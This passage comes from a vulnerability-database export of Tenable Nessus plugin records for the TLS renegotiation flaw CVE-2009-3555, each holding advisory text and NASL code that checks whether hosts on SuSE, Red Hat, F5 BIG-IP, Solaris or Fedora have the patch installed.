script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"gnutls-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-devel-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-extra-devel-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-extra26-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls26-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", 
reference:\"libgnutls26-32bit-2.4.1-24.10.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:02:31", "description": "IBM Java 1.4.2 was updated to Version U13 FP 4 iFixes, to fix the SSL\nrenegotiation flaw reported as CVE-2009-3555, and also SAP installer\nrelated bugs.", "edition": 23, "published": "2010-06-11T00:00:00", "title": "SuSE9 Security Update : IBM Java 1.4.2 (YOU Patch Number 12621)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2010-06-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12621.NASL", "href": "https://www.tenable.com/plugins/nessus/46863", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46863);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"SuSE9 Security Update : IBM Java 1.4.2 (YOU Patch Number 12621)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 1.4.2 was updated to Version U13 FP 4 iFixes, to fix the SSL\nrenegotiation flaw reported as CVE-2009-3555, and also SAP installer\nrelated bugs.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://support.novell.com/security/cve/CVE-2009-3555.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12621.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"IBMJava2-JRE-1.4.2_sr13.4-0.7\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"IBMJava2-SDK-1.4.2_sr13.4-0.7\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"IBMJava2-JRE-1.4.2_sr13.4-0.10\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", 
reference:\"IBMJava2-SDK-1.4.2_sr13.4-0.10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T13:07:34", "description": "Updated openssl097a packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nA flaw was found in the way the TLS/SSL (Transport Layer\nSecurity/Secure Sockets Layer) protocols handled session\nrenegotiation. A man-in-the-middle attacker could use this flaw to\nprefix arbitrary plain text to a client's session (for example, an\nHTTPS connection to a website). This could force the server to process\nan attacker's request as if authenticated using the victim's\ncredentials. This update addresses this flaw by implementing the TLS\nRenegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details\nabout this flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nAll openssl097a users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
For the update to\ntake effect, all services linked to the openssl097a library must be\nrestarted, or the system rebooted.", "edition": 29, "published": "2010-05-11T00:00:00", "title": "RHEL 5 : openssl097a (RHSA-2010:0164)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2010-05-11T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:openssl097a", "cpe:/o:redhat:enterprise_linux:5.4"], "id": "REDHAT-RHSA-2010-0164.NASL", "href": "https://www.tenable.com/plugins/nessus/46275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0164. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46275);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_xref(name:\"RHSA\", value:\"2010:0164\");\n\n script_name(english:\"RHEL 5 : openssl097a (RHSA-2010:0164)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl097a packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nA flaw was found in the way the TLS/SSL (Transport Layer\nSecurity/Secure Sockets Layer) protocols handled session\nrenegotiation. A man-in-the-middle attacker could use this flaw to\nprefix arbitrary plain text to a client's session (for example, an\nHTTPS connection to a website). This could force the server to process\nan attacker's request as if authenticated using the victim's\ncredentials. This update addresses this flaw by implementing the TLS\nRenegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details\nabout this flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nAll openssl097a users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
For the update to\ntake effect, all services linked to the openssl097a library must be\nrestarted, or the system rebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3555\"\n );\n # http://kbase.redhat.com/faq/docs/DOC-20491\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/20490\"\n );\n # http://kbase.redhat.com/faq/docs/DOC-26039\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/15835\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0164\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl097a package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl097a\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0164\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"openssl097a-0.9.7a-9.el5_4.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if 
(tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl097a\");\n }\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T10:04:41", "description": "The remote BIG-IP device is missing a patch required by a security\nadvisory.", "edition": 28, "published": "2014-10-10T00:00:00", "title": "F5 Networks BIG-IP : SSL Renegotiation vulnerability (SOL10737)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2014-10-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL10737.NASL", "href": "https://www.tenable.com/plugins/nessus/78123", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL10737.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78123);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36935);\n\n script_name(english:\"F5 Networks BIG-IP : SSL Renegotiation vulnerability (SOL10737)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote BIG-IP device is missing a patch required by a 
security\nadvisory.\"\n );\n # http://devcentral.f5.com/Default.aspx?tabid=53&forumid=5&postid=86456&view=topic\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?04fbb370\"\n );\n # http://tools.ietf.org/html/rfc5746\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://tools.ietf.org/html/rfc5746\"\n );\n # https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?127ec32a\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K10737\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL10737.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL10737\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.2.5\",\"9.3.0-9.3.1\",\"9.4.0-9.4.8\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\",\"9.3.0-9.3.1\",\"9.4.0-9.4.8\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\",\"9.3.0-9.3.1\",\"9.4.0-9.4.8\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.1.3\",\"9.2.0-9.2.5\",\"9.3.0-9.3.1\",\"9.4.0-9.4.8\",\"9.6.0-9.6.1\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"9.4.5-9.4.8\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"9.4.0-9.4.8\",\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = 
make_list(\"10.0.0-10.0.1\",\"10.1.0\",\"10.2.0-10.2.2\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"10.2.3-10.2.4\",\"11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:33", "description": "SunOS 5.10: wanboot patch.\nDate this patch was last updated by Sun : Jun/18/10", "edition": 21, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 145102-01", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:145102", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_145102-01.NASL", "href": "https://www.tenable.com/plugins/nessus/107577", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107577);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"Solaris 10 (sparc) : 145102-01\");\n script_summary(english:\"Check for patch 145102-01\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 145102-01\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.10: wanboot patch.\nDate this patch was last updated by Sun : Jun/18/10\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/145102-01\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 145102-01\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:145102\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"145102-01\", obsoleted_by:\"142909-17 \", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.08.25.02.12\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWcakr\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T10:07:00", "description": "Update to 1.1.18, implementing a mitigation for 
CVE-2009-3555.\nhttp://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\nhttp://marc.info/?l=tomcat-dev&m=125900987921402&w=2\nhttp://marc.info/?l=tomcat-dev&m=125874793414940&w=2\nhttp://marc.info/?l=tomcat-user&m=125874793614950&w=2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-12-18T00:00:00", "title": "Fedora 11 : tomcat-native-1.1.18-1.fc11 (2009-12305)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-18T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:tomcat-native", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-12305.NASL", "href": "https://www.tenable.com/plugins/nessus/43328", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12305.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43328);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36935);\n script_xref(name:\"FEDORA\", value:\"2009-12305\");\n\n script_name(english:\"Fedora 11 : tomcat-native-1.1.18-1.fc11 (2009-12305)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.1.18, implementing a mitigation for 
